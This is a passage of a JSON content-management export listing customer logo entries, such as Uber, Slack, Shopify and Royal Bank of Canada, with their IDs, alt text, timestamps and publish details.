Business","updated_at":"2022-05-12T21:58:02.898Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:09.979Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt14e12ede074158c9","ACL":{},"alt_text_l10n":"VELTRA","created_at":"2022-05-12T21:58:02.710Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: VELTRA","updated_at":"2022-05-12T21:58:02.710Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:28:53.192Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt7ea26ad5fc793765","ACL":{},"alt_text_l10n":"Vandis","created_at":"2022-05-12T21:58:02.535Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Vandis","updated_at":"2022-05-12T21:58:02.535Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.465Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt2203ed64e9786c6c","ACL":{},"alt_text_l10n":"USGS","created_at":"2022-05-12T21:58:02.367Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: USGS","updated_at":"2022-05-12T21:58:02.367Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:02.426Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltccc935fe8a1f29ba","ACL":{},"alt_text_l10n":"USAA","created_at":"2022-05-12T21:58:02.019Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: USAA","updated_at":"2022-05-12T21:58:02.019Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:09.959Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltc5de4351d329c977","ACL":{},"alt_text_l10n":"U.S. Census Bureau","created_at":"2022-05-12T21:58:01.828Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: U.S. Census Bureau","updated_at":"2022-05-12T21:58:01.828Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:02.700Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt70b7be1d1e8ccb44","ACL":{},"alt_text_l10n":"University of Washington","created_at":"2022-05-12T21:58:01.647Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: University of Washington","updated_at":"2022-05-12T21:58:01.647Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.303Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt2010c4f7bec1f9ad","ACL":{},"alt_text_l10n":"University of Oxford","created_at":"2022-05-12T21:58:01.474Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: University of Oxford","updated_at":"2022-05-12T21:58:01.474Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:02.364Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt9bdf058039e5089b","ACL":{},"alt_text_l10n":"UCLA","created_at":"2022-05-12T21:58:01.296Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: UCLA","updated_at":"2022-05-12T21:58:01.296Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:51.607Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt46f1e819a511f5d1","ACL":{},"alt_text_l10n":"Uber","created_at":"2022-05-12T21:58:01.109Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Uber","updated_at":"2022-05-12T21:58:01.109Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:19.137Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt04691d5f3c58841e","ACL":{},"alt_text_l10n":"Twilio","created_at":"2022-05-12T21:58:00.926Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Twilio","updated_at":"2022-05-12T21:58:00.926Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:28:53.018Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blted80a9d45fb0acfd","ACL":{},"alt_text_l10n":"TV2","created_at":"2022-05-12T21:58:00.757Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: TV2","updated_at":"2022-05-12T21:58:00.757Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:18.032Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltbd8c9425f16c9672","ACL":{},"alt_text_l10n":"Travelport","created_at":"2022-05-12T21:58:00.576Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Travelport","updated_at":"2022-05-12T21:58:00.576Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:02.627Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt003b6fde98d77510","ACL":{},"alt_text_l10n":"Transit Wireless","created_at":"2022-05-12T21:58:00.405Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Transit Wireless","updated_at":"2022-05-12T21:58:00.405Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:28:52.981Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt2f85af70aca589e9","ACL":{},"alt_text_l10n":"Tinder","created_at":"2022-05-12T21:58:00.229Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Tinder","updated_at":"2022-05-12T21:58:00.229Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:10.580Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt75dd759b88e10d4f","ACL":{},"alt_text_l10n":"Ticketmaster","created_at":"2022-05-12T21:58:00.042Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Ticketmaster","updated_at":"2022-05-12T21:58:00.042Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.378Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blta48036c82747cd11","ACL":{},"alt_text_l10n":"Thought Machine","created_at":"2022-05-12T21:57:59.850Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Thought Machine","updated_at":"2022-05-12T21:57:59.850Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:51.667Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltaf0d546ca9881f6b","ACL":{},"alt_text_l10n":"Thomson Reuters","created_at":"2022-05-12T21:57:59.666Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Thomson Reuters","updated_at":"2022-05-12T21:57:59.666Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:51.754Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt2f7c0e2579506913","ACL":{},"alt_text_l10n":"TheLadders","created_at":"2022-05-12T21:57:59.482Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: TheLadders","updated_at":"2022-05-12T21:57:59.482Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:10.571Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt9144d7bae77f3980","ACL":{},"alt_text_l10n":"The Warehouse Group","created_at":"2022-05-12T21:57:59.291Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: The Warehouse Group","updated_at":"2022-05-12T21:57:59.291Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:45.107Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltf24dd4413895a40b","ACL":{},"alt_text_l10n":"The New York TImes","created_at":"2022-05-12T21:57:59.107Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: The New York TImes","updated_at":"2022-05-12T21:57:59.107Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:18.076Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt8429054e58ba5b24","ACL":{},"alt_text_l10n":"The Home Depot","created_at":"2022-05-12T21:57:58.927Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: The Home Depot","updated_at":"2022-05-12T21:57:58.927Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.524Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt4d9b0dc0b5f353fe","ACL":{},"alt_text_l10n":"The Guardian","created_at":"2022-05-12T21:57:58.746Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: The Guardian","updated_at":"2022-05-12T21:57:58.746Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:19.181Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt834b83b884bd1cc3","ACL":{},"alt_text_l10n":"Texas A\u0026M - College of Engineering","created_at":"2022-05-12T21:57:58.568Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Texas A\u0026M - College of Engineering","updated_at":"2022-05-12T21:57:58.568Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.517Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltbd8894252579fd84","ACL":{},"alt_text_l10n":"Terradue","created_at":"2022-05-12T21:57:58.388Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Terradue","updated_at":"2022-05-12T21:57:58.388Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:02.620Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt8d90e6427c85ef91","ACL":{},"alt_text_l10n":"Tencent Cloud Meeting","created_at":"2022-05-12T21:57:58.202Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Tencent Cloud Meeting","updated_at":"2022-05-12T21:57:58.202Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:45.065Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltaeee5f2a21417391","ACL":{},"alt_text_l10n":"Telefónica","created_at":"2022-05-12T21:57:58.017Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Telefónica","updated_at":"2022-05-12T21:57:58.017Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:51.747Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt25c843667d1ed774","ACL":{},"alt_text_l10n":"TechCrunch","created_at":"2022-05-12T21:57:57.825Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: TechCrunch","updated_at":"2022-05-12T21:57:57.825Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:02.463Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt9b529fc1222a4f36","ACL":{},"alt_text_l10n":"Tanium","created_at":"2022-05-12T21:57:57.658Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Tanium","updated_at":"2022-05-12T21:57:57.658Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:51.594Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt6305a55e7e7805bd","ACL":{},"alt_text_l10n":"Tango","created_at":"2022-05-12T21:57:57.474Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Tango","updated_at":"2022-05-12T21:57:57.474Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:26.552Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt825c87c4454c6156","ACL":{},"alt_text_l10n":"T-Mobile","created_at":"2022-05-12T21:57:57.290Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: T-Mobile","updated_at":"2022-05-12T21:57:57.290Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.504Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltca9187c8910c9b75","ACL":{},"alt_text_l10n":"Symantec","created_at":"2022-05-12T21:57:57.109Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Symantec","updated_at":"2022-05-12T21:57:57.109Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:09.933Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt1328cc5ce7eb909b","ACL":{},"alt_text_l10n":"Swiss Life","created_at":"2022-05-12T21:57:56.925Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Swiss Life","updated_at":"2022-05-12T21:57:56.925Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:28:53.137Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt2a813038618cda91","ACL":{},"alt_text_l10n":"SWIFT","created_at":"2022-05-12T21:57:56.742Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: SWIFT","updated_at":"2022-05-12T21:57:56.742Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:10.459Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt1d7a2be5c14c39d2","ACL":{},"alt_text_l10n":"SurveyMonkey","created_at":"2022-05-12T21:57:56.566Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: SurveyMonkey","updated_at":"2022-05-12T21:57:56.566Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:02.324Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltdc3097f3b5d94d31","ACL":{},"alt_text_l10n":"Sunhotels","created_at":"2022-05-12T21:57:56.390Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Sunhotels","updated_at":"2022-05-12T21:57:56.390Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:17.857Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltead29dd9cb2c5198","ACL":{},"alt_text_l10n":"Stormfish","created_at":"2022-05-12T21:57:56.200Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Stormfish","updated_at":"2022-05-12T21:57:56.200Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:18.005Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt80fa85da43cd7f60","ACL":{},"alt_text_l10n":"St. Mary's University","created_at":"2022-05-12T21:57:56.027Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: St. Mary's University","updated_at":"2022-05-12T21:57:56.027Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.485Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt847355fe381f7d05","ACL":{},"alt_text_l10n":"Sprint","created_at":"2022-05-12T21:57:55.841Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Sprint","updated_at":"2022-05-12T21:57:55.841Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.530Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltd67becbdb7ec9752","ACL":{},"alt_text_l10n":"Spring","created_at":"2022-05-12T21:57:55.663Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Spring","updated_at":"2022-05-12T21:57:55.663Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:10.012Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blte6bcf470301e8002","ACL":{},"alt_text_l10n":"Sovren","created_at":"2022-05-12T21:57:55.478Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Sovren","updated_at":"2022-05-12T21:57:55.478Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:17.960Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt5ecfdd579f982fb0","ACL":{},"alt_text_l10n":"Southern Glazer's Wine \u0026 Spirits","created_at":"2022-05-12T21:57:55.292Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Southern Glazer's Wine \u0026 Spirits","updated_at":"2022-05-12T21:57:55.292Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:26.474Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt1b10befcb9bdb126","ACL":{},"alt_text_l10n":"SoundCloud","created_at":"2022-05-12T21:57:55.107Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: SoundCloud","updated_at":"2022-05-12T21:57:55.107Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:02.248Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt8baf1d9627f2de05","ACL":{},"alt_text_l10n":"Softbank Payment Service","created_at":"2022-05-12T21:57:54.920Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Softbank Payment Service","updated_at":"2022-05-12T21:57:54.920Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:45.037Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt7cdcf30b6d665e85","ACL":{},"alt_text_l10n":"Softbank Corp.","created_at":"2022-05-12T21:57:54.730Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Softbank Corp.","updated_at":"2022-05-12T21:57:54.730Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.429Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt25e04f53c93351fb","ACL":{},"alt_text_l10n":"Snaptrip","created_at":"2022-05-12T21:57:54.537Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Snaptrip","updated_at":"2022-05-12T21:57:54.537Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:02.474Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt4da985a0ca92072e","ACL":{},"alt_text_l10n":"SMD-AM","created_at":"2022-05-12T21:57:54.359Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: SMD-AM","updated_at":"2022-05-12T21:57:54.359Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:19.191Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt3cbfcef99ac81d47","ACL":{},"alt_text_l10n":"Smarter City Solutions","created_at":"2022-05-12T21:57:54.179Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Smarter City Solutions","updated_at":"2022-05-12T21:57:54.179Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:19.021Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt330fa677d395c5ea","ACL":{},"alt_text_l10n":"Slack","created_at":"2022-05-12T21:57:54.008Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Slack","updated_at":"2022-05-12T21:57:54.008Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:10.627Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt85b53964d1493804","ACL":{},"alt_text_l10n":"Sky","created_at":"2022-05-12T21:57:53.820Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Sky","updated_at":"2022-05-12T21:57:53.820Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:44.968Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt792089b53ea0fda5","ACL":{},"alt_text_l10n":"Sitecore","created_at":"2022-05-12T21:57:53.650Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Sitecore","updated_at":"2022-05-12T21:57:53.650Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.408Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blta1154eb7fbf7a01e","ACL":{},"alt_text_l10n":"Shopify","created_at":"2022-05-12T21:57:53.473Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Shopify","updated_at":"2022-05-12T21:57:53.473Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:51.652Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt6b707f858a7d0f22","ACL":{},"alt_text_l10n":"Shopback","created_at":"2022-05-12T21:57:53.294Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Shopback","updated_at":"2022-05-12T21:57:53.294Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.236Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt9069c20f7952e8e0","ACL":{},"alt_text_l10n":"SEEK","created_at":"2022-05-12T21:57:53.122Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: SEEK","updated_at":"2022-05-12T21:57:53.122Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:45.092Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt0a642541e26e5754","ACL":{},"alt_text_l10n":"Science Warehouse","created_at":"2022-05-12T21:57:52.945Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Science Warehouse","updated_at":"2022-05-12T21:57:52.945Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:28:53.078Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blta8f6f46f2f41f207","ACL":{},"alt_text_l10n":"SAP Concur","created_at":"2022-05-12T21:57:52.769Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: SAP Concur","updated_at":"2022-05-12T21:57:52.769Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:51.721Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt611c1ca06db3dc55","ACL":{},"alt_text_l10n":"Salesforce","created_at":"2022-05-12T21:57:52.588Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Salesforce","updated_at":"2022-05-12T21:57:52.588Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:26.515Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltd8146b2d7dae5e77","ACL":{},"alt_text_l10n":"Safehouse","created_at":"2022-05-12T21:57:52.412Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Safehouse","updated_at":"2022-05-12T21:57:52.412Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:10.047Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blte7dc3c618676f8ff","ACL":{},"alt_text_l10n":"RSN","created_at":"2022-05-12T21:57:52.073Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: RSN","updated_at":"2022-05-12T21:57:52.073Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:17.970Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt862651b8bcbe5d28","ACL":{},"alt_text_l10n":"Royal Bank of Canada","created_at":"2022-05-12T21:57:51.901Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Royal Bank of Canada","updated_at":"2022-05-12T21:57:51.901Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:44.981Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt580fc883510ef9b8","ACL":{},"alt_text_l10n":"RockNSM","created_at":"2022-05-12T21:57:51.733Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: RockNSM","updated_at":"2022-05-12T21:57:51.733Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:26.421Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltaf0f913e34900622","ACL":{},"alt_text_l10n":"Roanoke College","created_at":"2022-05-12T21:57:51.568Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Roanoke College","updated_at":"2022-05-12T21:57:51.568Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:02.517Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt2bb106357877cd1f","ACL":{},"alt_text_l10n":"Rightmove","created_at":"2022-05-12T21:57:51.384Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Rightmove","updated_at":"2022-05-12T21:57:51.384Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:10.479Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltcb4b07e8c157bb46","ACL":{},"alt_text_l10n":"Renault","created_at":"2022-05-12T21:57:51.202Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: 